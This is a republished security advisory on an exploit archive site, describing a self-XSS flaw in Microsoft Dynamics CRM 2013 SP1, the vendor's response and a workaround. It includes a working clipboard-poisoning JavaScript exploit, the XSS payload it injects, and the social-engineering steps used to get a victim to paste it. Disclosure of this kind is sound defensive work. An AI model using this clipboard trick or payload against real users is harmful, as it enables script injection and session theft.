首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Dynamics CRM 2013 SP1 Cross Site Scripting Vulnerability
来源:https://www.htbridge.com 作者:htbridge 发布时间:2015-01-08  
Product: Microsoft Dynamics CRM 2013 SP1
Vendor: Microsoft Corporation
Vulnerable Version(s): (6.1.1.132) (DB 6.1.1.132) and probably prior
Tested Version: (6.1.1.132) (DB 6.1.1.132)
Advisory Publication:  December 29, 2014  [without technical details]
Vendor Notification: December 29, 2014
Public Disclosure: January 7, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered a DOM-based self-XSS vulnerability in Microsoft Dynamics CRM 2013 SP1, which can be exploited to perform Cross-Site Scripting attacks against authenticated users.
 
The vulnerability exists due to insufficient filtration of user-supplied input passed to the "/Biz/Users/AddUsers/SelectUsersPage.aspx" script after an unsuccessful attempt to send XML SOAP request. A remote attacker can trick a logged-in user to insert malicious HTML and script code into the "newUsers_ledit" input field and execute it in user’s browser in context of vulnerable web application.
 
To successfully exploit this vulnerability (as any other XSS vulnerability, besides stored ones) an attacker should use a social engineering technique to trick the user to insert malicious code into the above-mentioned field on the vulnerable page. Being a self-XSS, the vulnerability still remains quite useful to perform attacks against users of Microsoft Dynamics CRM that is quite secure. Below you can find the exploitation scenario applicable to any web application running Microsoft Dynamics CRM.
  
Using pretty simple social engineering technique attacker can trick a user to copy some "legitimate" text from a specially prepared malicious page to user's clipboard using "Ctrl+C" or mouse, and then paste it into the vulnerable web page.
 
Simple exploit code bellow will display a legitimate text to the user, and then replace the text in user's clipboard with our exploit code:
 
 
<script>
// simple exploit to poison clipboard
        function replaceBuffer() {
  var selection = window.getSelection(),
        eviltext = '1<img src=x onerror=alert("ImmuniWeb") />',
        copytext = eviltext,
        newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        document.body.appendChild(newdiv);
        newdiv.innerHTML = copytext;
        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {
            document.body.removeChild(newdiv);
        }, 100);
    }
    document.addEventListener('copy', replaceBuffer);
</script>
In order to find hidden users just copy this string into the search window:
HIDDEN USERS&&DISPLAY
 
 
The victim will see the following text in the browser:
 
HIDDEN USERS&&DISPLAY
 
 
However, will copy and paste the following malicious payload:
 
1<img src=x onerror=alert("ImmuniWeb")>
 
 
Attacker then can trick then the user to paste copied buffer into the "newUsers_ledit" field on the "https://[victim_host]/[site]/Biz/Users/AddUsers/SelectUsersPage.aspx" page and the JS code will be executed in context of the vulnerable website.
 
Below you can see the image with user cookies displayed in JS pop-up:
 
Quick video of exploitation:
 
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
On the 31st of December 2014, Microsoft replied the following:
 
"MSRC does not consider self-XSS issues to be security vulnerabilities. For a discussion of how we define security vulnerabilities, see http://www.microsoft.com/technet/archive/community/columns/security/essays/vulnrbl.mspx "
 
Taking into consideration the rise of successful self-XSS attacks campaigns in 2014 we do consider this issue to be a security vulnerability. As vendor refused to provide an official fix for the vulnerability, we suggest to block access to the vulnerable script using WAF or web server configuration as a temporary solution.
 

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·McAfee ePolicy Orchestrator Au
·Pandora 3.1 Auth Bypass / Arbi
·BulletProof FTP Client BPS Buf
·AVM Fritz!box Auto Exploiter
·ManageEngine Desktop Central A
·Ntpdc 4.2.6p3 - Local Buffer O
·AdaptCMS 3.0.3 XSS / Remote Co
·OS X 10.9.x - sysmond XPC Priv
·HikaShop 2.3.3 Local File Incl
·RedStar 3.0 Desktop - Privileg
·SkinCrafter3_vs2010 ActiveX Ex
·RedStar 3.0 Desktop - Privileg
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved